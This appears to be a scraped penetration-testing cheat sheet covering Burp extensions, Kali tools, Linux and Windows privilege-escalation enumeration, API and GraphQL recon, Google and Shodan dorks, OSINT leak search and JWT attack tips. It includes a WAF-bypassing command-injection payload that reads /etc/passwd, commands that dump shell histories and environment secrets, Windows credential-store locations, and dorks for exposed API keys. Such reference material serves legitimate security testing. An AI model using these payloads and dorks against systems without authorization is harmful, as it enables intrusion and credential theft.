- Software Vulnerability Scanner - This extension displays public vulnerabilities for applications detected in the traffic proxied by Burp. Essentially, it acts as a layer between Burp and the API of this excellent vulnerability aggregator
- Backslash Powered Scanner - Enhances Burp's active scanner using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities
- CSTC, Modular HTTP Manipulator - CyberChef integrated in BurpSuite with live modification of requests at your fingertips
- SQLiPy - A tool that integrates Burp Suite with SQLMap using the SQLMap API to check for SQL injection vulnerabilities
- Active Scan++ - Expands the range of checks performed by the active and passive scanners. It identifies vulnerabilities such as cache poisoning, DNS rebinding, various injections, and also performs additional checks to detect XXE injections and more
- Turbo Intruder - A faster alternative to Intruder equipped with a scriptable engine for sending a large number of HTTP requests and analyzing the results. Useful when speed is required
- Bypass WAF - A tool for bypassing web application firewalls (WAFs)
- BurpJS Link Finder - Helps identify and discover links based on JavaScript in web applications
- 403 Bypasser Extension - A tool designed to bypass 403 errors commonly encountered when attempting to access restricted areas of a website
- InQL to assist in your GraphQL security testing efforts
- Backslash Powered Scanner. This extension complements Burp's active scanner by using a novel approach capable of finding and confirming both known and unknown classes of server-side injection vulnerabilities
- Hackvertor is a tag-based conversion tool that supports various escapes and encodings including HTML5 entities, hex, octal, unicode, url encoding etc
- OpenAPI Parser. Extension streamlines the process of assessing web services that use OpenAPI-based APIs
- JS Link Finder. Extension for a passively scanning JavaScript files for endpoint links. - Export results the text file - Exclude specific 'js' files e.g. jquery, google-analytics (Professional)
- Content Type Converter. This extension converts data submitted within requests between various common formats:
- JSON To XML
- XML to JSON
- Body parameters to JSON
- Body parameters to XML
- Param miner. Extension identifies hidden, unlinked parameters. It's particularly useful for finding web cache poisoning vulnerabilities
- Pentest Mapper. Is a extension that integrates the Burp Suite request logging with a custom application testing checklist
- Piper makes integrating external tools into Burp easier
Kali Tools
- Name That Hash - Instantly name the type of any hash (with hashcat command)
- wafw00f - This package identifies and fingerprints Web Application Firewall (WAF) products
- gowitness is a website screenshot utility, that uses Chrome Headless to generate screenshots of web interfaces using the command line
- Commix is an open source penetration testing tool for command injections
name-that-hash --helpwafw00f -hPlatforms for hacking and pentesting
<-- Back
Privilege Escalation
ENUMERATION is a key!
Linux
Some advice to Linux Privilege Escalation- Check out user are running -
whoami - Check out groups does running user belong to -
id - Check out what is the server named -
hostname - Check out what subnet did land in -
ifconfigorip -a - Check out kernel (
uname -a) and OS version (cat /etc/os-release) - Check out screen version -
screen -v - Check out .ssh folder in
/home/<USERNAME>/.sshor/root/.ssh - Check out all environment variables
env - Check out login shells exist on the server -
cat /etc/shells - Check out Cron Tab:
- Check out setuid and setgid
- Find world writable files for every users -
find / -perm -2 -type f 2>/dev/null - Check out NOPASSWD sudo command -
sudo -l - Check out PATH -
echo $PATH - Check out the routing table by
routeornetstat -rn - Check out arp table -
arp -a - Check out environ:
- Check out history:
- Check out executable files in:
- Check out some additional information about the host itself such as the CPU type/version -
lscpu - Check out logrotate version -
logrotate --version. This github tool can help with privesc - Look at:
- Open ports
- .bat and .bak files
- Interesting permissions
ls -la /etc/cron.d
ls -la /etc/init.d
To find files with sticky bit:
find / -perm -u=s -type f 2>/dev/nullfind / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/nullfind / -perm -4000 2>/dev/nullTo check out rights
ls -la cat /proc/self/environ history
cat ~/.bash_history
cat ~/.mysql_history
cat ~/.nano_history
cat ~/.php_history
cat ~/.atftp_history
cat ~/.*history | less - all history search
home directory and /var/www or the same
Windows
-
systeminfo- information about the target system -
cmdkey /list- list any saved credentials\
<-- Back
Tips
- If you have JSON in request, try to change JSON to XML
- Command Injection
If you find Command Injection and the WAF blocks keywords, you can attempt a bypass method by adding a backslash and a newline character between the blacklisted words.
c\%0aat /et\%0ac/pas\%0aswd - If target use svg files, try to upload svg with XSS or XML payload
- Interesting file location:
Windows hashes
- Local computer:
- File: \%systemroot%\system32\config\SAM
- Registry: HKEY_LOCAL_MACHINE\SAM
- File: \%systemroot%\system32\confog\SECURITY
- Registry: HKEY_LOCAL_MACHINE\SECURITY\SAM
- Active Directory:
- %systemroot%\ntds\ntds.dit
- Identifying Algorithm from the first hash blocks:
- Salted MD5 -
$1$... - SHA-256 -
$5$... - SHA-512 -
$6$... - BCrypt -
$2a$... - Scrypt -
$7$... - Argon2 -
$argon2i$...
- Salted MD5 -
- Headers:
- X-Forwarded-For. (XFF) header is an HTTP header used to identify the original IP address of a client connecting to a web server through an HTTP proxy or load balancer. By including this header, the server can log and track the original client's IP address instead of the proxy or load balancer's IP.
- Virtual Box:
- How to enable Nested VT-x in Windows:
cd C:\Program Files\Oracle\VirtualBoxVBoxManage.exe list vmsVBoxManage.exe modifyvm <"NAME_OF_MACHINE"> --nested-hw-virt on
- How to enable Nested VT-x in Windows:
- Configuration files:
- /.htaccess
- /.htpasswd
- /web.config
- /.git/config
- /nginx.conf
- /server-status
- /status
- /cgi-bin/php.ini
- Secure your machine!
- Tallow. All traffic throw tor
- Safing Portmaster. Your firewall
- mat2. Tool gets rid of metadata everywhere
- Unified Kill Chain
1. Reconnaissance (MITRE Tactic TA0043)
2. Weaponization (MITRE Tactic TA0001)
3. Social Engineering (MITRE Tactic TA0001)
4. Exploitation (MITRE Tactic TA0002)
5. Persistence (MITRE Tactic TA0003)
6. Defence Evasion (MITRE Tactic TA0005)
7. Command & Control (MITRE Tactic TA0011)
8. Pivoting (MITRE Tactic TA0008)/a>)
- Jenkins endpoints.
- • /signup
- • /jenkins/signup
- 403 Bypass
- Try to change method to PATCH and add header
Accept: application/json
- Try to change method to PATCH and add header
<-- Back
GPTs (Agents) for Cybersecurity
- MagicUnprotect - allows interacting with the Unprotect knowledge base on malware evasion techniques
- Threat Intel Bot - GPT agent for retrieving the latest data on APT groups
- Hacker News GPT - summarizes the most relevant and discussed Hacker News articles
- ATT&CK Mate - get any answer about the ATT&CK knowledge base
- Smart Contract Audit Assistant - a high-precision tool for auditing smart contracts
- AlphaHoundAI - expert in BloodHound CE, Cypher, SharpHound, and related tools
- zkGPT - if you want to master cryptography, use this agent
- OSISTent - will assist you in solving various OSINT tasks and research
- Bug Bounty Assistant - a guide for web application security
- Full List
<-- Back
OSINT
- Tools for searching data by email and logins
Snusbase indexes information from leaks and provides access to searching compromised email addresses, logins, names, IP addresses, phone numbers, and password hashes
Have I Been Pwned? is a data breach search engine. It allows you to check which incidents a specific email address has been involved in
Hunter and Skymem - search for corporate email addresses by URL
Whatsmyname - searches for accounts on various services by username. The service is based on publicly available JSON
User Searcher - a free tool that helps find users by login on over 2,000 websites
CheckUserNames, Instant, Namecheckr, Peekyou, Usersearch - online services for searching user accounts by username
<-- Back
API
Tools
- Burp Extensions - Autorize, Param Miner
- Postman. Like Burp but for API requests
- JWT_Tool
- Kiterunner
- Arjun. For params fuzzing
- Rested (FireFox extension) - Quick request sender. Usefull with API
Tips ←
- Wordlists:
- Try to:
- Check the JS files to find api endpoints
- Change methods
- If BFLA doesn`t allow to see one record, try to get all (/users instead of /user/1)
- Check numbers of version (for example v0, v1, v2, v3, v4 etc)
- Fuzz parameters and/or query
- Remove Bearer from Authorization header (
Authorization: <JWT>) - Endpoints:
- https://target.domain/api
- https://target.domain/v1, https://target.domain/v2 etc
- https://target.domain/api/v1, https://target.domain/api/v2 etc
- https://target.domain/swagger
- https://target.domain/docs
- https://target.domain/rest
- https://api.target.domain
- https://target.com/docs
- https://dev.target.com/rest
- https://dev.target.com/playground
- https://dev.target.com/altair
- Google Dorking:
inurl:/api/admin site:target.com-
inurl:"/wp-json/wp/v2/users"- Finds all publicly available WordPress API user directories intitle:"index of" intext:"api"-
intitle:"index.of" intext:"api.txt"- Finds publicly available API key files -
inurl:"/api/*" intext:"index of"- Finds potentially interesting API directories -
ext:php inurl:"api.php?action="- Finds all sites with a XenAPI SQL injection vulnerability intext:api filetype:env-
intitle:"index of" api_key OR "api key" OR apiKey -pool- It lists potentially exposed API keys intext:APIKey ext:js | xml | yaml | txt | conf | py intitle:"index of"intitle:"index of" "api.yaml""api" ext:log- Git Dorking:
- filename:swagger.json
- extension: .json
- searching “api key,” "api keys", "apikey", "authorization: Bearer", "access_token", "secret", or “token.”
- Shodan:
port:80,443 http.status:200 "Content-Type: application/json"-
"Content-Type: application/xml"- Find web servers returning potential endpoints that use XML (ie: SOAP) -
"Content-Type: application/json"- Find web servers returning potential endpoints that use JSON -
"wp-json"- This will search for web applications using the WordPress API -
"X-*API*" hostname:"*.target.domain"- Find servers that contain custom headers related to “API”. ie: X-API-KEY, X-API-VERSION, X-API-ENV, X-AMZ-API-PATH etc -
ssl.cert.subject.cn:target.domain- Find servers who have been issued an SSL cert for *.target.domain -
ssl:"<Company Name">- Find servers who have been issued an SSL cert relating to the company you are targeting. Useful for certs generated by SaaS/cloud vendors offering services to the target (ie: AWS, Azure, Google, etc). This typically finds stuff in the Issued To organization fields. - Some resources:
seclists/Discovery/Web-Content/api/
seclists/Discovery/Web-Content/api/objects.txt
seclists/Discovery/Web-Content/api/actions.txt
seclists/Discovery/Web-Content/swagger.txt
seclists/Discovery/Web-Content/common-api-endpoints-mazen160.txt
GraphQL
- Tools
- Altair GraphQL Client (desktop, FireFox, Chrome)
- Clairvoyance. Obtain GraphQL API schema even if the introspection is disabled
- InQL (github, burp) - GraphQL Scanner
- graphw00f - GraphQL Server Fingerprinting
- BatchQL - security auditing script
- graphql-path-enum is a tool that lists the different ways of reaching a given type in a GraphQL schema
- GraphQL Cop is a small Python utility to run common security tests against GraphQL APIs
- CrackQL is a versatile GraphQL penetration testing tool that exploits poor rate-limit and cost analysis controls to brute-force credentials and fuzz operations
- graphql-voyager ← upload introspection and see schema
- nmap-graphql-introspection-nse
- Wordlists:
/usr/share/wordlists/seclists/Discovery/Web-Content/api/- common-graphql-endpoints.txt
- non-production-graphql-urls.txt
- Request -> To Repeater -> right-click > GraphQL > Set introspection query. To insert an introspection query into the request body to see much more about GraphQL tree data and manipulate
- Endpoints:
- /graphql
- /graphiql
- /api
- /api/graphql
- /graphql/api
- /graphql?debug=1
- /graphql/graphql
- If these common endpoints don't return a GraphQL response, you could also try appending /v1 to the path
<-- Back
WordPress
- Endpoints:
wp-json/wp/v2/users
<-- Back
JWT
Some tips:- Great tool for work with JWT - JWT_Tool
- Try easy change params
- Check delete all or delete a couple of chars of signature and send a response
- Try to brute force signature key
- Send a response without signature and set "alg":"none"(or None, or nOne, or NONE). Try send with and without second dot.
- Try to use JWK if alg is asymmetric encryption (RS256, ES256 etc)
- If there is a jku, try to put yourself url with a key